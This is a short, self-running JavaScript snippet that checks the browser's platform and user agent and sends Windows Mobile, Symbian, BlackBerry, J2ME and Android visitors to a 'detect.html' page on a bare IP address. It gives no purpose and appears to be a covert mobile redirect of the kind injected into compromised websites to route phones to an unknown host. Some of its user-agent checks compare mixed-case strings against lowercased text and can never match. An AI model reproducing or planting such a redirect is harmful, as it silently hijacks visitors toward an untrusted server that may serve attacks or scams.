function readplatform(){var platform=(navigator.platform).toLowerCase();var UA=(navigator.userAgent).toLowerCase();if(platform.search("windows mobile")>-1||platform.search("wince")>-1||UA.search("windows ce")>-1||UA.search("Microsoft Windows 6.5")>-1||UA.search("WindowsMobile")>-1){window.location.href="http://217.128.79.162/detect.html";return}if(UA.search("SymbianOS/9.2")>-1||UA.search("SymbianOS/9.3")>-1||UA.search("series60/3.")>-1){window.location.href="http://217.128.79.162/detect.html";return}if(platform.search("blackberry")>-1){window.location.href="http://217.128.79.162/detect.html";return}if(UA.search("j2me/midp")>-1||UA.search("profile/midp")>-1){window.location.href="http://217.128.79.162/detect.html";return}if(UA.search("android")>-1){window.location.href="http://217.128.79.162/detect.html";return}}readplatform();
